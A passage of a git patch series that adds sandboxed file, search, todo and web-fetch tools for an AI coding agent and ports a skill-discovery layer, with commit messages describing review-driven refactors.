+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface GrepMatch {
+  file: string;
+  line: number;
+  content: string;
+}
+
+const grepInputSchema = z.object({
+  pattern: z.string().describe("Regex pattern to search for"),
+  path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"),
+  glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"),
+  caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"),
+});
+
+const GREP_TIMEOUT_MS = 30_000;
+const MAX_TOTAL_MATCHES = 100;
+const MAX_PER_FILE_MATCHES = 10;
+const MAX_LINE_LENGTH = 200;
+
+/**
+ * `grep` — search for POSIX-ERE patterns across files in the sandbox via
+ * `grep -rn`. Caps results to 100 total / 10 per file / 200 chars per
+ * match line so long stdouts don't blow the model context.
+ */
+export const grepTool = tool({
+  description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE).
+
+WHEN TO USE:
+- Finding where a function, variable, or string literal is used
+- Locating configuration keys, routes, or error messages across files
+- Narrowing down which files to read or edit
+
+WHEN NOT TO USE:
+- Simple filename-only searches (use globTool instead)
+- Directory listings, builds, or other shell tasks (use bashTool instead)
+
+USAGE:
+- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+")
+- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]]
+- Search a specific file OR an entire directory via the path parameter
+- Use workspace-relative paths for path (e.g., "src")
+- Optionally filter files with glob (e.g., "*.ts", "*.test.js")
+- Matches are SINGLE-LINE: patterns do not span across newline characters
+- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters
+
+IMPORTANT:
+- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool
+- Use caseSensitive: false for case-insensitive searches
+- Hidden files and node_modules are skipped when searching directories`,
+  inputSchema: grepInputSchema,
+  execute: async (
+    { pattern, path: searchPath, glob, caseSensitive = true },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "grep");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(searchPath)
+        ? searchPath
+        : path.resolve(workingDirectory, searchPath);
+
+      const args: string[] = ["grep", "-rn"];
+      if (!caseSensitive) args.push("-i");
+      args.push(
+        `--exclude-dir=${shellEscape(".*")}`,
+        `--exclude-dir=${shellEscape("node_modules")}`,
+      );
+      if (glob) args.push(`--include=${shellEscape(glob)}`);
+      args.push(
+        "-m",
+        String(MAX_PER_FILE_MATCHES),
+        "-E",
+        shellEscape(pattern),
+        shellEscape(absolutePath),
+      );
+      const command = args.join(" ");
+
+      const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, {
+        signal: abortSignal,
+      });
+
+      // grep exits with 1 when no matches found — that's not an error.
+      if (!result.success && result.exitCode !== 1) {
+        const errorOutput = (result.stderr || result.stdout).slice(0, 500);
+        return {
+          success: false,
+          error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`,
+        };
+      }
+
+      const matches: GrepMatch[] = [];
+      const filesSet = new Set<string>();
+      const fileMatchCounts = new Map<string, number>();
+
+      const lines = result.stdout.split("\n").filter(Boolean);
+      for (const line of lines) {
+        if (matches.length >= MAX_TOTAL_MATCHES) break;
+
+        // grep -rn output: file:line:content. Find the `:digits:` separator.
+        const match = line.match(/:(\d+):/);
+        if (!match || match.index === undefined) continue;
+        const file = line.slice(0, match.index);
+        const rest = line.slice(match.index + 1);
+        const colonIndex = rest.indexOf(":");
+        if (colonIndex === -1) continue;
+
+        const lineNum = parseInt(rest.slice(0, colonIndex), 10);
+        const content = rest.slice(colonIndex + 1);
+        if (isNaN(lineNum)) continue;
+
+        const displayFile = toDisplayPath(file, workingDirectory);
+        filesSet.add(displayFile);
+        const currentFileCount = fileMatchCounts.get(displayFile) ?? 0;
+        if (currentFileCount >= MAX_PER_FILE_MATCHES) continue;
+
+        fileMatchCounts.set(displayFile, currentFileCount + 1);
+        matches.push({
+          file: displayFile,
+          line: lineNum,
+          content: content.slice(0, MAX_LINE_LENGTH),
+        });
+      }
+
+      return {
+        success: true,
+        pattern,
+        matchCount: matches.length,
+        filesWithMatches: filesSet.size,
+        matches,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Grep failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts
new file mode 100644
index 000000000..f5a486a64
--- /dev/null
+++ b/lib/agent/tools/readFileTool.ts
@@ -0,0 +1,70 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const readInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"),
+  offset: z.number().optional().describe("Line number to start reading from (1-indexed)"),
+  limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"),
+});
+
+/**
+ * `read` — read a file from the sandbox. Returns numbered lines in the
+ * format `N: <content>` so the model can refer to specific lines when
+ * later editing.
+ */
+export const readFileTool = tool({
+  description: `Read a file from the filesystem.
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/index.ts")
+- Paths are resolved from the workspace root
+- By default reads up to 2000 lines starting from line 1
+- Use offset and limit for long files (both are line-based, 1-indexed)
+- Results include line numbers starting at 1 in "N: content" format
+
+IMPORTANT:
+- Always read a file at least once before editing it with the edit/write tools
+- This tool can only read files, not directories — attempting to read a directory returns an error
+- You can call multiple reads in parallel to speculatively load several files`,
+  inputSchema: readInputSchema,
+  execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "read");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+
+      const stats = await sandbox.stat(absolutePath);
+      if (stats.isDirectory()) {
+        return {
+          success: false,
+          error: "Cannot read a directory. Use glob or ls command instead.",
+        };
+      }
+
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+      const lines = content.split("\n");
+      const startLine = Math.max(1, offset) - 1;
+      const endLine = Math.min(lines.length, startLine + limit);
+      const selectedLines = lines.slice(startLine, endLine);
+      const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        totalLines: lines.length,
+        startLine: startLine + 1,
+        endLine,
+        content: numberedLines.join("\n"),
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts
new file mode 100644
index 000000000..8ba4a71a3
--- /dev/null
+++ b/lib/agent/tools/shellEscape.ts
@@ -0,0 +1,14 @@
+/**
+ * Escape a string for safe use as a single-quoted shell argument.
+ *
+ * Wraps the string in single quotes and escapes any embedded single
+ * quotes via the standard `' → '\''` dance (close quote, escape literal
+ * quote, reopen quote). Everything else stays verbatim inside single
+ * quotes — shell metacharacters like `$`, `` ` ``, `&`, `*` are NOT
+ * expanded so the result is safe to pass to `bash -c` or `sh -c`.
+ *
+ * @param s - The string to escape.
+ */
+export function shellEscape(s: string): string {
+  return "'" + s.replace(/'/g, "'\\''") + "'";
+}
diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts
new file mode 100644
index 000000000..827c391af
--- /dev/null
+++ b/lib/agent/tools/toDisplayPath.ts
@@ -0,0 +1,34 @@
+import * as path from "path";
+
+function isPathWithinDirectory(filePath: string, directory: string): boolean {
+  const resolvedPath = path.resolve(filePath);
+  const resolvedDir = path.resolve(directory);
+  return resolvedPath.startsWith(resolvedDir + path.sep) || resolvedPath === resolvedDir;
+}
+
+/**
+ * Convert an absolute (or relative-to-workingDirectory) path into a compact
+ * model-friendly display path.
+ *
+ * Paths inside the working directory are returned relative (e.g.
+ * `src/index.ts`) to avoid repeating long absolute prefixes in tool output.
+ * Paths outside the working directory remain absolute for clarity and safety
+ * (e.g. `/etc/hosts`). All separators are normalized to `/`.
+ *
+ * @param filePath - Absolute or workspace-relative file path.
+ * @param workingDirectory - The sandbox's working directory (always absolute).
+ */
+export function toDisplayPath(filePath: string, workingDirectory: string): string {
+  const absolutePath = path.isAbsolute(filePath)
+    ? path.resolve(filePath)
+    : path.resolve(workingDirectory, filePath);
+
+  if (!isPathWithinDirectory(absolutePath, workingDirectory)) {
+    return absolutePath.replace(/\\/g, "/");
+  }
+
+  const relativePath = path.relative(workingDirectory, absolutePath);
+  if (relativePath === "") return ".";
+
+  return relativePath.replace(/\\/g, "/");
+}
diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts
new file mode 100644
index 000000000..d91e9147a
--- /dev/null
+++ b/lib/agent/tools/todoWriteTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+
+export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]);
+export type TodoStatus = z.infer<typeof todoStatusSchema>;
+
+export const todoItemSchema = z.object({
+  id: z.string().describe("Unique identifier for the todo item"),
+  content: z.string().describe("The task description"),
+  status: todoStatusSchema.describe(
+    "Current status. Only ONE task should be in_progress at a time.",
+  ),
+});
+export type TodoItem = z.infer<typeof todoItemSchema>;
+
+/**
+ * `todo_write` — the agent's planning surface. Stateless on the server side
+ * (the tool simply echoes the list back to the chat UI so the user sees the
+ * current plan). The agent uses this to track multi-step work and signal
+ * intent between turns.
+ *
+ * Slot into `buildAgentTools` as `todo_write: todoWriteTool`.
+ */
+export const todoWriteTool = tool({
+  description: `Create and manage a structured task list for the current session.
+
+WHEN TO USE:
+- Complex multi-step tasks requiring 3 or more distinct steps
+- When the user provides multiple requirements or a checklist
+- After receiving new instructions - immediately capture them as todos
+- When starting work on a task - mark that todo as in_progress BEFORE beginning
+- After completing a task - mark it as completed immediately
+
+WHEN NOT TO USE:
+- A single, straightforward task that can be done in one step
+- Trivial tasks requiring fewer than 3 minor steps
+- Purely conversational or informational queries
+
+TASK STATES:
+- "pending": Task not yet started
+- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time)
+- "completed": Task finished successfully
+
+USAGE:
+- This tool REPLACES the entire todo list - always send the full, updated list of todos
+- Use it frequently to keep the task list in sync with your actual progress
+- Update statuses as you start and finish work, rather than batching updates later
+
+IMPORTANT:
+- Only one todo should be in_progress at a time; avoid parallel in_progress tasks
+- Mark todos as completed as soon as they are done - do not wait to batch completions
+- Use clear, concise todo content so the list remains readable to the user`,
+  inputSchema: z.object({
+    todos: z
+      .array(todoItemSchema)
+      .describe("The complete list of todo items. This replaces existing todos."),
+  }),
+  execute: async ({ todos }) => {
+    return {
+      success: true,
+      message: `Updated task list with ${todos.length} items`,
+      todos,
+    };
+  },
+});
diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts
new file mode 100644
index 000000000..b395457f9
--- /dev/null
+++ b/lib/agent/tools/webFetchTool.ts
@@ -0,0 +1,124 @@
+import { tool } from "ai";
+import { z } from "zod";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+const FETCH_TIMEOUT_MS = 30_000;
+export const MAX_BODY_LENGTH = 10_000;
+
+const fetchInputSchema = z.object({
+  url: z.string().url().describe("The URL to fetch"),
+  method: z
+    .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"])
+    .optional()
+    .describe("HTTP method. Default: GET"),
+  headers: z
+    .record(z.string(), z.string())
+    .optional()
+    .describe("Optional HTTP headers as key-value pairs"),
+  body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"),
+});
+
+const fetchOutputSchema = z.union([
+  z.object({
+    success: z.literal(true),
+    status: z.number().int().nullable(),
+    body: z.string(),
+    truncated: z.boolean(),
+  }),
+  z.object({ success: z.literal(false), error: z.string() }),
+]);
+
+/**
+ * `web_fetch` — make an HTTP request from inside the sandbox via curl.
+ * Lives in the sandbox (not on the worker) so requests come from the
+ * sandbox's network egress, can reuse its env, and don't bypass any
+ * sandbox-level policies. Truncates response bodies to 10KB to protect
+ * model context.
+ */
+export const webFetchTool = tool({
+  description: `Fetch a URL from the web.
+
+USAGE:
+- Make HTTP requests to external URLs
+- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods
+- Returns the response status and body text
+- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`,
+  inputSchema: fetchInputSchema,
+  outputSchema: fetchOutputSchema,
+  execute: async (
+    { url, method = "GET", headers, body },
+    { experimental_context, abortSignal },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "web_fetch");
+    const workingDirectory = sandbox.workingDirectory;
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+
+    const args: string[] = [
+      "curl",
+      "-sS",
+      "-X",
+      method,
+      "--max-time",
+      String(Math.ceil(FETCH_TIMEOUT_MS / 1000)),
+      "-o",
+      `>(head -c ${MAX_BODY_LENGTH} >&3)`,
+      "-w",
+      shellEscape("%{http_code}"),
+    ];
+
+    if (headers) {
+      for (const [key, value] of Object.entries(headers)) {
+        args.push("-H", shellEscape(`${key}: ${value}`));
+      }
+    }
+    if (method !== "GET" && method !== "HEAD" && body) {
+      args.push("-d", shellEscape(body));
+    }
+    args.push(shellEscape(url));
+
+    // Use fd 3 to split curl's response body (truncated by `head -c`) from
+    // the status code written via `-w`. The body goes to stdout via fd 3
+    // → fd 1, then we append the status code on its own newline.
+    const command = [
+      "exec 3>&1",
+      `status=$(${args.join(" ")})`,
+      "curlExit=$?",
+      "exec 3>&-",
+      "printf '\\n%s' \"$status\"",
+      "exit $curlExit",
+    ].join("\n");
+
+    try {
+      const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses).
+      if (result.exitCode !== 0 && result.exitCode !== 23) {
+        return {
+          success: false,
+          error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`,
+        };
+      }
+
+      const output = result.stdout ?? "";
+      const lastNewline = output.lastIndexOf("\n");
+      const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : "";
+      const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output;
+      const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null;
+
+      return {
+        success: true,
+        status,
+        body: responseBody,
+        truncated: result.exitCode === 23,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Fetch failed: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts
new file mode 100644
index 000000000..c8e59e3c3
--- /dev/null
+++ b/lib/agent/tools/writeFileTool.ts
@@ -0,0 +1,65 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const writeInputSchema = z.object({
+  filePath: z
+    .string()
+    .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"),
+  content: z.string().describe("Content to write to the file"),
+});
+
+/**
+ * `write` — create or completely overwrite a file in the sandbox. Parent
+ * directories are created as needed. For small targeted edits prefer
+ * `editFileTool`.
+ */
+export const writeFileTool = tool({
+  description: `Write content to a file on the filesystem.
+
+WHEN TO USE:
+- Creating a new file that does not yet exist
+- Completely replacing the contents of an existing file after you've read it
+
+WHEN NOT TO USE:
+- Small or localized changes to an existing file (prefer editFileTool)
+- Reading files (use readFileTool instead)
+- Searching (use grepTool or globTool instead)
+
+USAGE:
+- Use workspace-relative paths (e.g., "src/user.test.ts")
+- This will OVERWRITE existing files entirely
+- Parent directories are created automatically if they do not exist
+
+IMPORTANT:
+- ALWAYS read an existing file with readFileTool before overwriting it
+- Prefer editing existing files over creating new ones unless a new file is explicitly needed
+- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them
+- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`,
+  inputSchema: writeInputSchema,
+  execute: async ({ filePath, content }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "write");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const dir = path.dirname(absolutePath);
+      await sandbox.mkdir(dir, { recursive: true });
+      await sandbox.writeFile(absolutePath, content, "utf-8");
+      const stats = await sandbox.stat(absolutePath);
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        bytesWritten: stats.size,
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to write file: ${message}` };
+    }
+  },
+});

From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 14:47:56 -0500
Subject: [PATCH 5/5] feat(chat-workflow): port skill discovery + skillTool (PR
 6, slim) (#587)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |   2 +-
 lib/agent/__tests__/buildAgentTools.test.ts   |  47 ++++-
 lib/agent/buildAgentTools.ts                  |  24 +--
 lib/agent/tools/AgentContext.ts               |  11 ++
 lib/agent/tools/__tests__/skillTool.test.ts   | 169 ++++++++++++++++++
 lib/agent/tools/skillTool.ts                  |  87 +++++++++
 .../handleChatWorkflowStream.test.ts          |  13 ++
 lib/chat/handleChatWorkflowStream.ts          |  21 +++
 lib/skills/__tests__/discoverSkills.test.ts   | 158 ++++++++++++++++
 lib/skills/__tests__/extractSkillBody.test.ts |  22 +++
 lib/skills/__tests__/findSkillFile.test.ts    |  34 ++++
 .../getGlobalSkillsDirectory.test.ts          |  15 ++
 .../getSandboxSkillDirectories.test.ts        |  23 +++
 lib/skills/__tests__/getSkills.test.ts        |  31 ++++
 .../__tests__/injectSkillDirectory.test.ts    |  14 ++
 .../__tests__/parseSkillFrontmatter.test.ts   |  56 ++++++
 .../__tests__/substituteArguments.test.ts     |  22 +++
 lib/skills/discoverSkills.ts                  |  89 +++++++++
 lib/skills/extractSkillBody.ts                |  14 ++
 lib/skills/findSkillFile.ts                   |  33 ++++
 lib/skills/getGlobalSkillsDirectory.ts        |  14 ++
 lib/skills/getSandboxSkillDirectories.ts      |  16 ++
 lib/skills/getSkills.ts                       |  22 +++
 lib/skills/injectSkillDirectory.ts            |  11 ++
 lib/skills/parseSkillFrontmatter.ts           |  52 ++++++
 lib/skills/skillTypes.ts                      |  76 ++++++++
 lib/skills/substituteArguments.ts             |  14 ++
 27 files changed, 1071 insertions(+), 19 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/skillTool.test.ts
 create mode 100644 lib/agent/tools/skillTool.ts
 create mode 100644 lib/skills/__tests__/discoverSkills.test.ts
 create mode 100644 lib/skills/__tests__/extractSkillBody.test.ts
 create mode 100644 lib/skills/__tests__/findSkillFile.test.ts
 create mode 100644 lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
 create mode 100644 lib/skills/__tests__/getSandboxSkillDirectories.test.ts
 create mode 100644 lib/skills/__tests__/getSkills.test.ts
 create mode 100644 lib/skills/__tests__/injectSkillDirectory.test.ts
 create mode 100644 lib/skills/__tests__/parseSkillFrontmatter.test.ts
 create mode 100644 lib/skills/__tests__/substituteArguments.test.ts
 create mode 100644 lib/skills/discoverSkills.ts
 create mode 100644 lib/skills/extractSkillBody.ts
 create mode 100644 lib/skills/findSkillFile.ts
 create mode 100644 lib/skills/getGlobalSkillsDirectory.ts
 create mode 100644 lib/skills/getSandboxSkillDirectories.ts
 create mode 100644 lib/skills/getSkills.ts
 create mode 100644 lib/skills/injectSkillDirectory.ts
 create mode 100644 lib/skills/parseSkillFrontmatter.ts
 create mode 100644 lib/skills/skillTypes.ts
 create mode 100644 lib/skills/substituteArguments.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index f9a894195..704035c64 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -42,7 +42,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   });
 
   const modelMessages = convertToModelMessages(input.messages);
-  const tools = buildAgentTools();
+  const tools = buildAgentTools({ skills: input.agentContext.skills });
   const result = streamText({
     model: gateway(input.modelId),
     system: agentCustomInstructions,
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 5478c59ca..fb5d99a5a 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
-const EXPECTED_TOOL_NAMES = [
+const BASE_TOOLS = [
   "bash",
   "read",
   "write",
@@ -13,19 +13,50 @@ const EXPECTED_TOOL_NAMES = [
 ] as const;
 
 describe("buildAgentTools", () => {
-  it("returns a tools record with all 8 leaf tools registered", () => {
+  it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => {
     const tools = buildAgentTools();
-    for (const name of EXPECTED_TOOL_NAMES) {
+    for (const name of BASE_TOOLS) {
       expect(tools).toHaveProperty(name);
     }
+    expect(tools).not.toHaveProperty("skill");
+  });
+
+  it("registers the skill tool when a non-empty skill catalog is provided", () => {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "commit",
+          description: "Make a commit",
+          path: "/sandbox/mono/skills/commit",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    });
+    expect(tools).toHaveProperty("skill");
+    for (const name of BASE_TOOLS) {
+      expect(tools).toHaveProperty(name);
+    }
+  });
+
+  it("omits the skill tool when an empty array is passed", () => {
+    const tools = buildAgentTools({ skills: [] });
+    expect(tools).not.toHaveProperty("skill");
   });
 
   it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
-    const tools = buildAgentTools() as Record<
-      string,
-      { description?: unknown; inputSchema?: unknown; execute?: unknown }
-    >;
-    for (const name of EXPECTED_TOOL_NAMES) {
+    const tools = buildAgentTools({
+      skills: [
+        {
+          name: "foo",
+          description: "x",
+          path: "/p",
+          filename: "SKILL.md",
+          options: {},
+        },
+      ],
+    }) as Record<string, { description?: unknown; inputSchema?: unknown; execute?: unknown }>;
+    for (const name of [...BASE_TOOLS, "skill"]) {
       const t = tools[name]!;
       expect(typeof t.description).toBe("string");
       expect(t.inputSchema).toBeDefined();
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index f9cbc2b39..393b32889 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -6,24 +6,27 @@ import { grepTool } from "@/lib/agent/tools/grepTool";
 import { globTool } from "@/lib/agent/tools/globTool";
 import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
 import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
- * Each tool reads its sandbox handle + recoup creds from `experimental_context`
- * at execute time — the factory takes no arguments because the tools are
- * stateless modulo that context.
+ * Each tool reads its sandbox handle + per-prompt context from
+ * `experimental_context` at execute time — the factory is otherwise stateless.
  *
- * Currently ships 8 leaf tools:
- *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ * Currently ships 9 tools:
+ *   - 6 file/shell: bash, read, write, edit, grep, glob
  *   - todo_write (planning surface; stateless, echoes the list back)
  *   - web_fetch (HTTP via curl inside the sandbox)
